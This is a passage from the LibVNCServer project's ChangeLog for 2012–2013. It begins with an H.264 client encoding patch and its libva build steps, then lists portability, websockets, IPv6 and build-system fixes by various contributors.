set top boxes... This patch only provides the client side support and is meant to be
used with corresponding server-side support, as provided by an
upcoming patch for qemu ui/vnc module (to view the display of a
virtual machine executing under QEMU). With this H.264-based encoding, if multiple framebuffer update
messages are generated for a single server framebuffer modification,
the H.264 frame data is sent only with the first update message.
Subsequent update framebuffer messages will contain only the
coordinates and size of the additional updated regions. Instructions/Requirements: * The patch should be applied on top of the previous patch I
submitted with minor enhancements to the gtkvncviewer application:
http://sourceforge.net/mailarchive/message.php?msg_id=30323804 * Currently only works with libva 1.0: use branch "v1.0-branch" for
libva and intel-driver. Those can be built as follows: cd libva git checkout v1.0-branch ./autogen.sh make sudo make install cd .. git clone git://anongit.freedesktop.org/vaapi/intel-driver cd intel-driver git checkout v1.0-branch ./autogen.sh make sudo make install Signed-off-by: David Verbeiren <david.verbeiren@intel.com>
2013-01-08 David Verbeiren <david.verbeiren@intel.com>
* client_examples/gtkvncviewer.c: gtkvncviewer enhancements Hide "Connecting" dialog in gtkvncviewer once an update is received. Hide local cusror in gtkvncviewer.
2012-09-14 Christian Beier <dontmind@freeshell.org>
* AUTHORS: Add Raphael to AUTHORS.
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* libvncclient/rfbproto.c: Include strings.h for strncasecmp(3)
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* libvncserver/websockets.c: Work around a gcc bug with anonymous
structs and unions. GCC < 4.6 failed to parse the declaration of ws_header_t correctly
because it did not accept anonymous structs and unions. [1] Work around the bug by adding names to the unions and structs. Ugly,
but works. [1] http://gcc.gnu.org/bugzilla/show_bug.cgi?id=4784
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* libvncserver/rfbserver.c: Include stdio.h for snprintf(3)
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* libvncserver/websockets.c: Add the required headers for read(2)
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* CMakeLists.txt, configure.ac, libvncserver/websockets.c,
rfb/rfbconfig.h.cmake: Use htobeNN(3) to convert numbers in
websocket.c. byteswap.h exists only on glibc, so building libvncserver with
websockets support was not possible in other systems. Replace the inclusion of byteswap.h and the WS_* definitions with
calls to htobeNN, which should perform the same conversions, be more
portable and avoid the need to check for the platform's endianness.
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* CMakeLists.txt, configure.ac: Do not hardcode the need for
libresolv. libresolv is only present on systems which use glibc; platforms such
as FreeBSD have __b64_ntop as part of libc itself. Improve the detection process and only link against libresolv if it
exists on the system, and remember to reset CMAKE_REQUIRED_LIBRARIES
after performing the necessary tests, since we do not always want to
link against libresolv.
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* common/vncauth.c, libvncclient/rfbproto.c,
libvncclient/sockets.c, libvncserver/httpd.c,
libvncserver/rfbserver.c, libvncserver/sockets.c,
libvncserver/websockets.c: Tune the definitions needed when building
with -ansi. The current definitions were mostly useful to glibc and followed its
feature_test_macros(3) documentation. However, this means other platforms still had problems when building
with strict compilation flags. _BSD_SOURCE, for example, is only
recognized by glibc, and other platforms sometimes need
_XOPEN_SOURCE instead, or even the removal of some definitions (such
as the outdate _POSIX_SOURCE one). _POSIX_SOURCE also had to be conditionally defined in some places,
as what it enables or disables during compilation varies across
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* libvncserver/sockets.c, libvncserver/websockets.c: Add some
missing feature macro definitions. Building with -ansi failed due to some code (as well as system
headers) using non-C89 features. Fix that by adding the usual
_POSIX_SOURCE and _BSD_SOURCE definitions already present in some
other files.
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* common/turbojpeg.c, libvncserver/tight.c,
libvncserver/websockets.c, rfb/rfb.h, rfb/rfbconfig.h.cmake,
test/bmp.h: Use C-style comments in rfbconfig.h.cmake and C source
code. Using C++-style comments when building the code with -ansi does not
work, so be more conservative with the comment style.
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* libvncserver/websockets.c: Correctly include rfbconfig.h. build_dir/rfb is not passed as an include directory automatically to
the compiler, so including that file fails.
2012-09-11 Raphael Kubo da Costa <rakuco@FreeBSD.org>
* CMakeLists.txt: CMake: Link against libgcrypt when it is found. So far, libgcrypt was looked for but no targets linked against it
directly; this caused linking problems for the client and server
examples, as the symbols they needed were not passed to the linker. The issue that the GnuTLS websockets code uses libgcrypt regardless
of whether it has been found or not has not been touched by this
commit, though.
2012-08-19 Christian Beier <dontmind@freeshell.org>
* webclients/novnc/LICENSE.txt, webclients/novnc/README.md,
webclients/novnc/include/rfb.js, webclients/novnc/include/ui.js,
webclients/novnc/include/util.js, webclients/novnc/include/vnc.js,
webclients/novnc/include/webutil.js, webclients/novnc/vnc.html,
webclients/novnc/vnc_auto.html: Update noVNC webclient.
2012-08-19 Christian Beier <dontmind@freeshell.org>
2012-08-08 Oliver Loch <o.loch@gmx.net>
* libvncserver/sockets.c: Patched sockets.c to allow the use of IPv6
without IPv4. As requested only those lines are indented that have been changed.
2012-07-20 Johannes Schindelin <johannes.schindelin@gmx.de>
* AUTHORS: Add another contributor Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
2012-07-19 Rostislav Lisovy <lisovy@gmail.com>
* libvncclient/tls_openssl.c: Fix in milliseconds to struct timeval
conversion Signed-off-by: Rostislav Lisovy <lisovy@gmail.com> Signed-off-by:
Johannes Schindelin <johannes.schindelin@gmx.de>
2012-05-31 Christian Beier <dontmind@freeshell.org>
* libvncserver/config.h, libvncserver/rfbconfig.h: Remove
autogenerated files from repo.
2012-05-23 Christian Beier <dontmind@freeshell.org>
* CMakeLists.txt, configure.ac, rfb/rfbconfig.h.cmake: Add Compile
Time Version Test Defines.
2012-05-18 Kyle J. McKay <mackyle@gmail.com>
* libvncserver/sockets.c: libvncserver/sockets.c: do not segfault
when listenSock/listen6Sock == -1
2012-05-09 Christian Beier <dontmind@freeshell.org>
* TODO, libvncclient/rfbproto.c, libvncclient/sockets.c,
vncterm/LinuxVNC.c: Fix some compiler warnings that hinted some no
too unimportant errors.
2012-05-07 Christian Beier <dontmind@freeshell.org>
* TODO: Update TODO.
2012-05-07 Luca Falavigna <dktrkranz@debian.org>
* test/encodingstest.c: Encodingstest: Use format string argument
with fprintf.
2012-05-05 Christian Beier <dontmind@freeshell.org>
* CMakeLists.txt, configure.ac: Bump version to 0.9.10.
2012-05-04 Christian Beier <dontmind@freeshell.org>
* ChangeLog: Update ChangeLog for 0.9.9.
2012-05-04 Christian Beier <dontmind@freeshell.org>
* configure.ac: Enable building DLLs with MinGW32.
